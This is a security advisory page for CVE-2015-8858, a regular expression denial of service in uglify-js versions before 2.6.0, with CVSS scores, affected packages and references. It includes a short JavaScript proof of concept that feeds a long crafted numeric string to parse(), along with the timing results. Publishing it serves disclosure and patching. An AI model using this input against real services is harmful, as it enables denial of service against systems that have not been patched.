CVE-2015-8858

HIGH7.5EPSS 0.90%

Regular Expression Denial of Service in uglify-js

Published: 10/24/2017Modified: 11/8/2023

Also known as:GHSA-c9f4-xj24-8jqxDEBIAN-CVE-2015-8858

Description

Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method. ### Proof of Concept ``` var u = require('uglify-js'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;"); ``` ### Results ``` $ time node test.js 10000 real 0m1.091s user 0m1.047s sys 0m0.039s $ time node test.js 80000 real 0m6.486s user 0m6.229s sys 0m0.094s ``` ## Recommendation Update to version 2.6.0 or later.

Affected packages (2)

Debian/uglifyjsfrom 0, < 2.7.4-1
npm/uglify-jsfrom 0, < 2.6.0

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	HIGH7.5	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References (6)

ADVISORYhttps://github.com/advisories/GHSA-c9f4-xj24-8jqx
ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2015-8858
ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2015-8858
WEBhttps://www.npmjs.com/advisories/48
WEBhttp://www.openwall.com/lists/oss-security/2016/04/20/11
WEBhttp://www.securityfocus.com/bid/96409